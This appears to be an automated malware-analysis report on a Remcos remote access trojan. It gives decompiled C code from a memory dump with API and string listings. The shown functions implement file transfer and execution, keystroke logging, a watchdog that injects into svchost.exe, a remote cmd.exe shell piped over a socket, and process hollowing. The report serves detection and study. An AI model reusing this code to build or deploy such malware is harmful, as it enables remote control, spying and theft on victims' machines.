					_t658 = _t657 - 0x18;
					E00402036(0x46b218, _t658, _t550, _t668, _t340);
					_push(E00401E4F(E00416DA4(E00401DAD( &_v288, _t550, _t668, _t610), _t668)));
					_t345 = E00405FBB( &_v136, _t342);
					_t363 = _t345;
					E00401E54();
					_t349 = E00416D1F( &_v312, E00416DA4(E00401DAD( &_v368, _t342, _t668, _t610), _t668));
					_t659 = _t658 - 0x18;
					_t545 = _t659;
					_push(_t349);
					_t669 = _t345;
					if(_t345 == 0) {
						_t550 = "Failed to upload file: ";
						E0040713C(_t363, _t545, "Failed to upload file: ", _t585, __eflags);
						_t546 = _t659 - 0x14;
						_push("[ERROR]");
					} else {
						_t550 = "Uploaded file: ";
						E0040713C(_t363, _t545, "Uploaded file: ", _t585, _t669);
						_t546 = _t659 - 0x14;
						_push("[Info]");
					}
					E00401FCE(_t363, _t546);
					E00416673(_t363, _t585);
					E00401F11();
					E00401E54();
					L00406E3E(_t363,  &_v132, _t550, _t585, _t610);
				}
				goto L42;
			}

0x00406496
0x00406496
0x004064a6
0x004064a8
0x004064ab
0x004064b0
0x004064b8
0x004064d2
0x004064dc
0x004064e1
0x004064ec
0x004064f1
0x004064fe
0x00406507
0x00406511
0x00406514
0x00406516
0x00406aca
0x00406aca
0x00406ad0
0x00406cc9
0x00406cd2
0x00406ce1
0x00406ceb
0x00406ced
0x00406d03
0x00406cef
0x00406cf6
0x00406cf6
0x00406d09
0x00406d12
0x00406d14
0x00406d3b
0x00406d40
0x00406d45
0x00406d4c
0x00406d59
0x00406d5e
0x00406d61
0x00406d69
0x00406d6e
0x00406d71
0x00406d73
0x00406d16
0x00406d1a
0x00406d1f
0x00406d22
0x00406d2a
0x00406d2f
0x00406d32
0x00406d34
0x00406d34
0x00406d78
0x00406d7d
0x00406d82
0x00406d89
0x00406d94
0x00406d99
0x00406d9e
0x00406da0
0x00406da5
0x00406da7
0x00406dfe
0x00406e02
0x00406e02
0x00406e07
0x00406e0b
0x00406e17
0x00406e20
0x00406e2d
0x00406da9
0x00406db4
0x00406dba
0x00406dc1
0x00406dd4
0x00406ddd
0x00406df1
0x00406df6
0x00406df6
0x00000000
0x00406dfb
0x00406da7
0x00406ad6
0x00406ad6
0x00406ad9
0x00406bc3
0x00406bd9
0x00406bf5
0x00406c0f
0x00406c1f
0x00406c2e
0x00406c30
0x00406c35
0x00406c35
0x00406c38
0x00406c76
0x00406c7a
0x00406c80
0x00406c87
0x00406c90
0x00406c3a
0x00406c3d
0x00406c48
0x00406c4e
0x00406c53
0x00406c99
0x00406753
0x00406753
0x00000000
0x00406753
0x00406adf
0x00406adf
0x00406ae2
0x00406b48
0x00406b5f
0x00406b65
0x00406b7b
0x00406b85
0x00406b8e
0x00406b99
0x00406ba8
0x00000000
0x00406ba8
0x00406ae4
0x00406ae4
0x00406ae7
0x00000000
0x00000000
0x00406aff
0x00406b24
0x00406b28
0x00000000
0x00406b2d
0x0040651c
0x00406841
0x0040684f
0x00406865
0x00406866
0x00406867
0x00406868
0x00406869
0x00406874
0x00406879
0x00406886
0x004068c0
0x004068cf
0x004068d8
0x004068e1
0x004068ea
0x0040690c
0x00406911
0x0040691c
0x00406921
0x00406924
0x0040692c
0x00406931
0x0040693d
0x00406946
0x00406958
0x0040695c
0x00406988
0x0040698d
0x00406990
0x00406992
0x00406a6b
0x00406a73
0x00406a7b
0x00406a8a
0x00406a8f
0x00406a9b
0x00406aa4
0x00406998
0x004069a7
0x004069ac
0x004069b7
0x004069c6
0x004069cb
0x004069d7
0x004069f7
0x004069ff
0x00406a07
0x00406a12
0x00406a17
0x00406a23
0x00406a2c
0x00406a3b
0x00406a40
0x00406a49
0x00406a49
0x00406ab0
0x00406abc
0x004067f3
0x004067f3
0x00000000
0x004067f3
0x00406522
0x00406525
0x0040680f
0x0040681a
0x00406827
0x0040682c
0x00406830
0x00000000
0x00406835
0x0040652b
0x0040652e
0x00406767
0x0040677b
0x00406792
0x00406798
0x004067a7
0x004067b0
0x004067c7
0x004067cb
0x004067d1
0x004067d8
0x004067e1
0x004067ea
0x00000000
0x004067ef
0x00406534
0x00406537
0x004066dc
0x004066eb
0x004066f0
0x00406701
0x0040671a
0x00406722
0x0040672a
0x00406739
0x0040673e
0x0040674a
0x00000000
0x0040674f
0x0040653d
0x00406540
0x0040666a
0x00406683
0x00406691
0x00406699
0x004066a1
0x004066b0
0x004066b5
0x004066c1
0x00000000
0x004066c1
0x00406546
0x00406546
0x00406549
0x00406556
0x00406561
0x00406566
0x0040656c
0x00406577
0x0040657c
0x00406582
0x0040658d
0x00406592
0x00406598
0x004065bc
0x004065c4
0x004065cd
0x004065cf
0x004065ef
0x004065f4
0x004065f7
0x004065f9
0x004065fa
0x004065fc
0x00406614
0x00406619
0x00406621
0x00406623
0x004065fe
0x004065fe
0x00406603
0x0040660b
0x0040660d
0x0040660d
0x00406628
0x0040662d
0x00406639
0x00406642
0x0040664e
0x0040664e
0x00000000

APIs

SetEvent.KERNEL32(?,?), ref: 004064B8
ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406683

Part of subcall function 00405FBB: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406006

Part of subcall function 00405DF1: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000), ref: 00405E4A
Part of subcall function 00405DF1: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,000186A0,?), ref: 00405E92
Part of subcall function 00405DF1: CloseHandle.KERNEL32(00000000), ref: 00405ECC
Part of subcall function 00405DF1: MoveFileW.KERNEL32(00000000,00000000), ref: 00405EE4

Part of subcall function 00416673: GetLocalTime.KERNEL32(00000000), ref: 0041668D

Part of subcall function 0040495D: send.WS2_32(?,00000000,00000000,00000000), ref: 004049D0

GetLogicalDriveStringsA.KERNEL32 ref: 00406767
StrToIntA.SHLWAPI(00000000,?), ref: 00406AFF
CreateDirectoryW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00406B7B

Part of subcall function 00405CDC: FindFirstFileW.KERNEL32(00000000,?), ref: 00405CF7

Strings

[Info], xrefs: 0040660D, 004066AB, 00406734, 00406924, 0040692B, 00406A11, 00406D34
Uploaded file: , xrefs: 004065FE
Downloaded file size: , xrefs: 004069AF
Failed to upload file: , xrefs: 00406614
[ERROR], xrefs: 00406623, 00406A85, 00406D73
[DEBUG], xrefs: 004069C1
Unable to delete: , xrefs: 00406D61
Deleted file: , xrefs: 00406D22
Downloading file: , xrefs: 00406914
Unable to rename file!, xrefs: 00406C61
Failed to download file: , xrefs: 00406A73
Browsing directory: , xrefs: 00406722
open, xrefs: 0040667D
Executing file: , xrefs: 00406699
Downloaded file: , xrefs: 004069FF

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: File$Create$CloseDirectoryDriveEventExecuteFindFirstHandleLocalLogicalMoveShellStringsTimeWritesend
String ID: Browsing directory: $Deleted file: $Downloaded file size: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Failed to upload file: $Unable to delete: $Unable to rename file!$Uploaded file: $[DEBUG]$[ERROR]$[Info]$open
API String ID: 3947485326-3341346664
Opcode ID: 4126ef46619cd386b34889e9196dfb87f533f8089621bcddb01497b19f9ed8bb
Instruction ID: ec2be71f6719916920786d5a7c97ce9d3a5bbac076dce40b915ebaf43e78cf86
Opcode Fuzzy Hash: 4126ef46619cd386b34889e9196dfb87f533f8089621bcddb01497b19f9ed8bb
Instruction Fuzzy Hash: AC3263716183005BC608FB76C8569AF77A5AFD1708F40093FF542671E2EE389A49C6DB

Uniqueness

Uniqueness Score: -1.00%

Function 00408ED1, Relevance: 34.4, Strings: 27, Instructions: 632COMMON

Download Yara Rule

Strings

[F3] , xrefs: 0040907C
[F6] , xrefs: 004090B9
[Down] , xrefs: 00408FBF
[F7] , xrefs: 00409125
[Up] , xrefs: 00408FDF
[F4] , xrefs: 0040906C
[Print] , xrefs: 0040901F
[Del] , xrefs: 004090AC
[End] , xrefs: 0040900F
[Tab] , xrefs: 00408F6D
[F1] , xrefs: 0040909C
[Esc] , xrefs: 00408F35
[F11] , xrefs: 004090F1
[PagUp] , xrefs: 00408F25
[Left] , xrefs: 00408FEF
[Enter] , xrefs: 00408F5D
[PagDw] , xrefs: 00408F8D
[Start] , xrefs: 00408FFF
[BckSp] , xrefs: 00408F7D
[F9] , xrefs: 0040910B
[Pause] , xrefs: 00408F4D
[F5] , xrefs: 0040905C
[F2] , xrefs: 0040908C
[Right] , xrefs: 00408FCF
[F12] , xrefs: 004090E4
[F8] , xrefs: 00409118
[F10] , xrefs: 004090FE

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: [BckSp] $ [Del] $ [Down] $ [End] $ [Enter] $ [Esc] $ [F10] $ [F11] $ [F12] $ [F1] $ [F2] $ [F3] $ [F4] $ [F5] $ [F6] $ [F7] $ [F8] $ [F9] $ [Left] $ [PagDw] $ [PagUp] $ [Pause] $ [Print] $ [Right] $ [Start] $ [Tab] $ [Up]
API String ID: 0-3968991301
Opcode ID: 9e27bcc624e23f58b5299daa17b146b53e955b1b79127a4f31d6d8b12af6a758
Instruction ID: aeea7f2fb10863e8034bae975c897a963037852550185894c4ac3f8ab5676f6a
Opcode Fuzzy Hash: 9e27bcc624e23f58b5299daa17b146b53e955b1b79127a4f31d6d8b12af6a758
Instruction Fuzzy Hash: 91F1B76175410172D81D343F4E6F93B3E19A263392BA042BFE883766CBD46E9E1942DF

Uniqueness

Uniqueness Score: -1.00%

Function 0040F31A, Relevance: 31.7, APIs: 7, Strings: 11, Instructions: 194
threadCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E0040F31A(void* __eflags) {
				char _v28;
				char _v36;
				void* _v40;
				char _v56;
				void* _v64;
				char _v76;
				char _v84;
				void* _v88;
				char _v100;
				char _v104;
				void* _v108;
				char _v124;
				char _v128;
				long _v132;
				char _v148;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t26;
				void* _t29;
				void* _t35;
				void* _t46;
				void* _t61;
				void* _t78;
				void* _t107;
				long _t112;
				long _t141;
				void* _t142;
				CHAR* _t143;
				void* _t145;
				signed int _t147;
				void* _t149;
				void* _t155;

				_t149 = (_t147 & 0xfffffff8) - 0x7c;
				_push(_t142);
				_t26 = GetCurrentProcessId();
				if(E00410470(0x46b4f8, E00401EF9(0x46b4f8), "WD", _t26) != 0) {
					_t29 = OpenMutexA(0x100000, 0, "Mutex_RemWatchdog");
					__eflags = _t29;
					if(_t29 == 0) {
						E0040201F(0x46b4f8,  &_v100);
						E0041735B(E00401E4F(0x46b4e0),  &_v100);
						E00401ED1(0x46b4f8,  &_v124);
						__eflags = E00416F93( &_v124);
						if(__eflags != 0) {
							_t35 = E0040412C(0x46b4f8,  &_v76, L"\\SysWOW64");
							E00401E5E( &_v132, _t37, _t142, E00402F24( &_v36, E0040412C(0x46b4f8,  &_v56, E00438F0F(0x46b4f8,  &_v76, __eflags, L"WinDir")), _t35));
							E00401E54();
							E00401E54();
						} else {
							_t61 = E0040412C(0x46b4f8,  &_v28, L"\\system32");
							E00401E5E( &_v132, _t63, _t142, E00402F24( &_v84, E0040412C(0x46b4f8,  &_v56, E00438F0F(0x46b4f8,  &_v28, __eflags, L"WinDir")), _t61));
							E00401E54();
							E00401E54();
						}
						E00401E54();
						E0040720A(0x46b4f8,  &_v124, 0, L"\\svchost.exe");
						_push(0x46ad4c);
						_t143 = E00401EF9( &_v104);
						_t46 = E00413BEA(E00401E4F( &_v128), _t143, __eflags);
						_t150 = _t149 - 0x18;
						_t107 = _t149 - 0x18;
						__eflags = _t46;
						if(_t46 != 0) {
							E00401FCE(0x46b4f8, _t107, "Watchdog module activated");
							E00401FCE(0x46b4f8, _t150 - 0x18, "[Info]");
							E00416673(0x46b4f8, 0);
							Sleep(0x7d0);
							_t112 =  *0x46ad54; // 0x0
							goto L13;
						}
						E00401FCE(0x46b4f8, _t107, "Watchdog launch failed!");
						E00401FCE(0x46b4f8, _t150 - 0x18, "[ERROR]");
						E00416673(0x46b4f8, 0);
						CloseHandle( *0x46ad5c);
						E00401E54();
						E00401F11();
						_push(3);
						_pop(1);
					} else {
						CloseHandle(_t29);
						_t155 = _t149 - 0x18;
						E00401FCE(0x46b4f8, _t155, "Remcos restarted by watchdog!");
						_t156 = _t155 - 0x18;
						E00401FCE(0x46b4f8, _t155 - 0x18, "[Info]");
						E00416673(0x46b4f8, 0);
						E00401FCE(0x46b4f8, _t156 + 0x18, "Watchdog module activated");
						E00401FCE(0x46b4f8, _t156 + 0x18 - 0x18, "[Info]");
						E00416673(0x46b4f8, 0);
						CreateThread(0, 0, E0040F94C, 0, 0, 0);
						_t143 = "WDH";
						_t78 = E00410145(E00401EF9(0x46b4f8), _t143,  &_v148);
						__eflags = _t78;
						if(_t78 == 0) {
							goto L1;
						} else {
							 *0x46ad4c = OpenProcess(0x1fffff, 0, _v132);
							E004105A2(E00401EF9(0x46b4f8), __eflags, _t143);
							_t112 = _v132;
							L13:
							L14();
							asm("int3");
							_push(_t143);
							_push(0);
							_t141 = _t112;
							L15:
							_t145 = OpenProcess(0x100000, 0, _t141);
							WaitForSingleObject(_t145, 0xffffffff);
							CloseHandle(_t145);
							__eflags =  *0x46ad4a;
							if(__eflags != 0) {
								E0040F31A(__eflags, 0);
							}
							goto L15;
						}
						L17:
					}
				} else {
					L1:
				}
				return 1;
				goto L17;
			}

0x0040f320
0x0040f324
0x0040f326
0x0040f349
0x0040f360
0x0040f366
0x0040f368
0x0040f3f7
0x0040f40c
0x0040f415
0x0040f41f
0x0040f421
0x0040f47e
0x0040f4aa
0x0040f4b3
0x0040f4bc
0x0040f423
0x0040f42c
0x0040f458
0x0040f461
0x0040f46a
0x0040f46f
0x0040f4c5
0x0040f4d3
0x0040f4d8
0x0040f4ea
0x0040f4f5
0x0040f4fb
0x0040f4fe
0x0040f500
0x0040f502
0x0040f509
0x0040f518
0x0040f51d
0x0040f52a
0x0040f530
0x00000000
0x0040f530
0x0040f53d
0x0040f54c
0x0040f551
0x0040f55f
0x0040f569
0x0040f572
0x0040f577
0x0040f579
0x0040f36e
0x0040f36f
0x0040f375
0x0040f37f
0x0040f384
0x0040f38f
0x0040f394
0x0040f3a3
0x0040f3ae
0x0040f3b3
0x0040f3c5
0x0040f3cf
0x0040f3df
0x0040f3e6
0x0040f3e8
0x00000000
0x0040f3ee
0x0040f596
0x0040f5a2
0x0040f5a8
0x0040f5ac
0x0040f5ac
0x0040f5b1
0x0040f5b2
0x0040f5b3
0x0040f5b4
0x0040f5b6
0x0040f5c4
0x0040f5c9
0x0040f5d0
0x0040f5d6
0x0040f5dd
0x0040f5e1
0x0040f5e1
0x00000000
0x0040f5dd
0x00000000
0x0040f3e8
0x0040f34b
0x0040f34b
0x0040f34d
0x0040f580
0x00000000

APIs

GetCurrentProcessId.KERNEL32 ref: 0040F326

Part of subcall function 00410470: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041047E
Part of subcall function 00410470: RegSetValueExA.ADVAPI32(?,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040A621,0045EF38,00000001,000000AF,Function_0005E65C), ref: 00410499
Part of subcall function 00410470: RegCloseKey.ADVAPI32(?,?,?,?,0040A621,0045EF38,00000001,000000AF,Function_0005E65C), ref: 004104A4

OpenMutexA.KERNEL32 ref: 0040F360
CloseHandle.KERNEL32(00000000), ref: 0040F36F
CreateThread.KERNEL32(00000000,00000000,0040F94C,00000000,00000000,00000000), ref: 0040F3C5
OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0040F58D

Strings

WinDir, xrefs: 0040F432, 0040F484
[Info], xrefs: 0040F387, 0040F38E, 0040F3AD, 0040F513
Watchdog launch failed!, xrefs: 0040F538
WDH, xrefs: 0040F3CF, 0040F3D5, 0040F593
\system32, xrefs: 0040F423
Mutex_RemWatchdog, xrefs: 0040F353
\svchost.exe, xrefs: 0040F4CA
\SysWOW64, xrefs: 0040F475
[ERROR], xrefs: 0040F547
Watchdog module activated, xrefs: 0040F39E, 0040F504
Remcos restarted by watchdog!, xrefs: 0040F37A

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
String ID: Mutex_RemWatchdog$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$[ERROR]$[Info]$\SysWOW64$\svchost.exe$\system32
API String ID: 3018269243-3797382479
Opcode ID: 326e9dd7d84c7af907198dd723bf39f8c9fd2e93f2cbba636866dac5e456e36c
Instruction ID: 7f996df7713c0643413fd7c7c2414cc6868829f4b8123739c7ec56891e0fef10
Opcode Fuzzy Hash: 326e9dd7d84c7af907198dd723bf39f8c9fd2e93f2cbba636866dac5e456e36c
Instruction Fuzzy Hash: 7951AE3160420067C618BB72DD0B9AE77A59A92719F10043FF942B25E3EF7C994C869F

Uniqueness

Uniqueness Score: -1.00%

Function 004054A8, Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 285
pipesleepfileCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E004054A8(char _a4) {
				long _v8;
				long _v12;
				long _v16;
				char _v40;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t52;
				void* _t56;
				void* _t66;
				void* _t78;
				CHAR* _t79;
				int _t96;
				void* _t105;
				intOrPtr _t144;
				long _t150;
				void* _t154;
				void* _t155;
				void* _t162;
				void* _t167;
				void* _t174;

				_t155 = _t154 - 0x3c;
				_t144 =  *((intOrPtr*)( *[fs:0x2c]));
				_t96 = 0;
				_push(0x46ccb0);
				if( *0x46ccb0 >  *((intOrPtr*)(_t144 + 4))) {
					E0042E7D2(0x46ccb0);
					_t159 =  *0x46ccb0 - 0xffffffff;
					if( *0x46ccb0 == 0xffffffff) {
						E00404712(0, 0x46cc28, 0);
						E0042EB5C(_t159, E00451B3F);
						E0042E793(_t144, 0x46ccb0);
					}
				}
				if( *0x46cc90 >  *((intOrPtr*)(_t144 + 4))) {
					E0042E7D2(0x46cc90);
					_t161 =  *0x46cc90 - 0xffffffff;
					if( *0x46cc90 == 0xffffffff) {
						E0040201F(_t96, 0x46ccb8);
						E0042EB5C(_t161, E00451B35);
						E0042E793(0x46cc90, 0x46cc90);
					}
				}
				_t98 =  &_v40;
				E0040201F(_t96,  &_v40);
				_t137 = 0xffffffffffffffff;
				_v8 = _t96;
				_t145 = 0x46b2b0;
				_t162 =  *0x46aae2 - _t96; // 0x0
				if(_t162 != 0) {
					L12:
					_v12 = _t96;
					PeekNamedPipe( *0x46cc98, _t96, _t96, _t96,  &_v12, _t96);
					if(_v12 <= _t96) {
						_t155 = _t155 - 0x18;
						E00401FCE(_t96, _t155, 0x45e65c);
						_push(0x62);
						_t137 = E0040495D(_t96, 0x46cc28, _t135, __eflags);
						goto L21;
					}
					_push(_v12);
					_t56 = E00438B8B(_t98);
					_t146 = _t56;
					ReadFile( *0x46cc98, _t56, _v12,  &_v16, _t96);
					if(_v16 <= _t96) {
						L19:
						L00438B86(_t146);
						_t145 = 0x46b2b0;
						goto L21;
					}
					if(_v8 <= _t96) {
						L17:
						E00401FCE(_t96,  &_v64, _t146);
						_t155 = _t155 - 0x18;
						_t105 = _t155;
						_push(_v16);
						_push(_t96);
						L18:
						E004058D1(_t96, _t105, _t135, _t171);
						_t137 = E0040495D(_t96, 0x46cc28, _t135, _t171, 0x62,  &_v64);
						E00401F11();
						goto L19;
					}
					_t66 = E00438BA0(_t146, E00401EF9( &_v40), _v8);
					_t155 = _t155 + 0xc;
					_t171 = _t66;
					if(_t66 != 0) {
						goto L17;
					}
					E00401FCE(_t96,  &_v64, _t146);
					_t155 = _t155 - 0x18;
					_t105 = _t155;
					_push(_v16 - _v8);
					_push(_v8);
					goto L18;
				} else {
					_t135 = "cmd.exe";
					_t42 = E0040592C("cmd.exe");
					_t163 = _t42;
					if(_t42 == 0) {
						L26:
						E00404CC1(_t42, 0x46cc28);
						CloseHandle( *0x46cc98);
						CloseHandle( *0x46ccb4);
						 *0x46aae2 = _t96;
						_t96 = 1;
						L27:
						E00401F11();
						E00401F11();
						return _t96;
					}
					E004058C8(_t96, 0x46ccb8, E00438F1A(_t96, _t163, "SystemDrive"));
					E004058BF(_t96, 0x46ccb8, 0xffffffffffffffff, "\\");
					0x46cbd0->nLength = 0xc;
					 *0x46cbd8 = 1;
					 *0x46cbd4 = _t96;
					if(CreatePipe(0x46ccac, 0x46cc94, 0x46cbd0, _t96) == 0 || CreatePipe(0x46cc98, 0x46ccb4, 0x46cbd0, _t96) == 0) {
						goto L27;
					} else {
						_t150 = 0x44;
						E004315B0(0x46cbe0, 0x46cbe0, _t96, CreatePipe);
						0x46cbe0->cb = _t150;
						 *0x46cc0c = 0x101;
						 *0x46cc10 = 0;
						 *0x46cc18 =  *0x46ccac;
						_t78 =  *0x46ccb4;
						 *0x46cc1c = _t78;
						 *0x46cc20 = _t78;
						_t79 = E00401EF9(0x46ccb8);
						 *0x46aae2 = CreateProcessA(_t96, E00401EF9(0x46b2b0), _t96, _t96, 1, _t96, _t96, _t79, 0x46cbe0, 0x46cc9c) != 0;
						E004058C8(_t96, 0x46b2b0, 0x45e65c);
						 *0x46aae3 = 1;
						E0040484C(0x46cc28);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						E004048C2("cmd.exe");
						_t155 = _t155 + 0xc - 0xfffffffffffffff8;
						E00402036(_t96, _t155, "cmd.exe", CreateProcessA(_t96, E00401EF9(0x46b2b0), _t96, _t96, 1, _t96, _t96, _t79, 0x46cbe0, 0x46cc9c),  &_a4);
						_push(0x93);
						_t98 = 0x46cc28;
						_t137 = E0040495D(_t96, 0x46cc28, "cmd.exe", CreateProcessA(_t96, E00401EF9(0x46b2b0), _t96, _t96, 1, _t96, _t96, _t79, 0x46cbe0, 0x46cc9c));
						Sleep(0x12c);
						_t167 =  *0x46aae2 - _t96; // 0x0
						if(_t167 == 0) {
							goto L26;
						}
						_t145 = 0x46b2b0;
						do {
							goto L12;
							L21:
							_t38 =  ==  ? 0 :  *0x46aae3 & 0x000000ff;
							_t98 = _t145;
							 *0x46aae3 =  ==  ? 0 :  *0x46aae3 & 0x000000ff;
							if(E004023D3() == 0) {
								_v8 = _t96;
							} else {
								E004058BF(_t96, _t145, _t137, "\n");
								E0040416D( &_v40, _t145);
								_t52 = E004023D3();
								WriteFile( *0x46cc94, E00401EF9(_t145), _t52,  &_v8, _t96);
								_t98 = _t145;
								E004058C8(_t96, _t145, 0x45e65c);
							}
							Sleep(0x64);
							_t174 =  *0x46aae3 - _t96; // 0x0
						} while (_t174 != 0);
						TerminateProcess(0x46cc9c->hProcess, _t96);
						CloseHandle( *0x46cca0);
						_t42 = CloseHandle( *0x46cc9c);
						goto L26;
					}
				}
			}

0x004054b1
0x004054b6
0x004054b8
0x004054bf
0x004054c6
0x004054ce
0x004054d3
0x004054db
0x004054e3
0x004054ed
0x004054f4
0x004054f9
0x004054db
0x00405505
0x0040550d
0x00405512
0x0040551a
0x00405521
0x0040552b
0x00405532
0x00405537
0x0040551a
0x00405538
0x0040553b
0x00405540
0x00405543
0x00405546
0x0040554b
0x00405551
0x004056c7
0x004056cb
0x004056d8
0x004056e1
0x00405783
0x0040578d
0x00405792
0x0040579e
0x00000000
0x0040579e
0x004056e7
0x004056ea
0x004056f1
0x00405701
0x0040570a
0x00405775
0x00405776
0x0040577c
0x00000000
0x0040577c
0x0040570f
0x00405744
0x00405748
0x0040574d
0x00405750
0x00405752
0x00405755
0x00405756
0x0040575a
0x0040576e
0x00405770
0x00000000
0x00405770
0x0040571e
0x00405723
0x00405726
0x00405728
0x00000000
0x00000000
0x0040572e
0x00405739
0x0040573c
0x0040573e
0x0040573f
0x00000000
0x00405557
0x00405557
0x0040555e
0x00405563
0x00405565
0x0040583f
0x00405844
0x0040584f
0x0040585b
0x00405861
0x00405867
0x00405869
0x0040586c
0x00405874
0x00405881
0x00405881
0x0040557e
0x0040558a
0x004055a6
0x004055b0
0x004055ba
0x004055c4
0x00000000
0x004055e0
0x004055e2
0x004055eb
0x004055f3
0x004055fb
0x00405605
0x0040561a
0x0040561f
0x00405625
0x0040562a
0x0040562f
0x00405658
0x0040565f
0x00405669
0x00405670
0x0040567f
0x00405680
0x00405681
0x00405682
0x0040568a
0x0040568f
0x00405698
0x0040569d
0x004056a2
0x004056ae
0x004056b0
0x004056b6
0x004056bc
0x00000000
0x00000000
0x004056c2
0x004056c7
0x00000000
0x004057a0
0x004057ac
0x004057af
0x004057b1
0x004057bd
0x00405803
0x004057bf
0x004057c6
0x004057cf
0x004057db
0x004057ef
0x004057fa
0x004057fc
0x004057fc
0x00405808
0x0040580e
0x0040580e
0x00405821
0x0040582d
0x00405839
0x00000000
0x00405839
0x004055c4

APIs

__Init_thread_footer.LIBCMT ref: 004054F4

Part of subcall function 0040495D: send.WS2_32(?,00000000,00000000,00000000), ref: 004049D0

__Init_thread_footer.LIBCMT ref: 00405532
CreatePipe.KERNEL32(0046CCAC,0046CC94,0046CBD0,00000000,Function_0005E674,00000000), ref: 004055C0
CreatePipe.KERNEL32(0046CC98,0046CCB4,0046CBD0,00000000), ref: 004055D6
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0046CBE0,0046CC9C), ref: 00405649
Sleep.KERNEL32(0000012C,00000093,?), ref: 004056B0
PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004056D8
ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405701

Part of subcall function 0042EB5C: __onexit.LIBCMT ref: 0042EB62

WriteFile.KERNEL32(00000000,00000000,?,00000000,0046B2B0,Function_0005E678,00000062,Function_0005E65C), ref: 004057EF
Sleep.KERNEL32(00000064,00000062,Function_0005E65C), ref: 00405808
TerminateProcess.KERNEL32(00000000), ref: 00405821
CloseHandle.KERNEL32 ref: 0040582D
CloseHandle.KERNEL32 ref: 00405839
CloseHandle.KERNEL32 ref: 0040584F
CloseHandle.KERNEL32 ref: 0040585B

Strings

SystemDrive, xrefs: 0040556B
cmd.exe, xrefs: 00405557

Memory Dump Source

Source File: 00000001.00000002.919290826.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.919336614.000000000046E000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
String ID: SystemDrive$cmd.exe
API String ID: 2994406822-3633465311
Opcode ID: 7ae97390e7ca440cacba461eaa0e64fac1d47d661ac2b88b3650a1555657d9f4
Instruction ID: f1f4fa96a31b56460b2630aa5cfbbf0430818023bfc25fb032acac6ab9db1ff3
Opcode Fuzzy Hash: 7ae97390e7ca440cacba461eaa0e64fac1d47d661ac2b88b3650a1555657d9f4
Instruction Fuzzy Hash: 5291C471A00204ABCB00BB65AD8697F3B69EB45714B50407FF949B72E2EFBC5D009B5E

Uniqueness

Uniqueness Score: -1.00%

Function 00413BEA, Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 155
injectionthreadmemoryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00413BEA(WCHAR* __ecx, void* __edx, void* __eflags) {
				void* __edi;
				void* _t51;
				void _t63;
				void* _t64;
				struct _PROCESS_INFORMATION* _t83;
				WCHAR* _t84;
				signed int _t86;
				void* _t90;
				void* _t92;
				CONTEXT* _t96;
				void* _t97;
				CONTEXT* _t98;
				intOrPtr* _t102;
				void* _t103;
				void* _t105;

				_t90 = __edx;
				_t84 = __ecx;
				E00450448(E004519FE, _t103);
				 *((intOrPtr*)(_t103 - 0x10)) = _t105 - 0x60;
				_t92 = _t90;
				 *(_t103 - 0x24) = _t92;
				 *(_t103 - 0x18) = _t84;
				 *(_t103 - 4) =  *(_t103 - 4) & 0x00000000;
				 *((intOrPtr*)(_t103 - 0x20)) = GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection");
				if( *_t92 != 0x5a4d) {
					L16:
					 *(_t103 - 4) =  *(_t103 - 4) | 0xffffffff;
					_t51 = 0;
				} else {
					_t102 =  *((intOrPtr*)(_t92 + 0x3c)) + _t92;
					if( *_t102 != 0x4550) {
						goto L16;
					} else {
						E004315B0(_t92, _t103 - 0x6c, 0, 0x44);
						_t83 =  *(_t103 + 8);
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						if(CreateProcessW(0,  *(_t103 - 0x18), 0, 0, 0, 4, 0, 0, _t103 - 0x6c, _t83) == 0) {
							goto L16;
						} else {
							_t96 = VirtualAlloc(0, 4, 0x1000, 4);
							 *(_t103 - 0x28) = _t96;
							_t96->ContextFlags = 0x10007;
							if(GetThreadContext(_t83->hThread, _t96) == 0 || ReadProcessMemory(_t83->hProcess, _t96->Ebx + 8, _t103 - 0x1c, 4, 0) == 0) {
								goto L16;
							} else {
								_t63 =  *(_t103 - 0x1c);
								if(_t63 ==  *(_t102 + 0x34)) {
									 *((intOrPtr*)(_t103 - 0x20))(_t83->hProcess, _t63);
								}
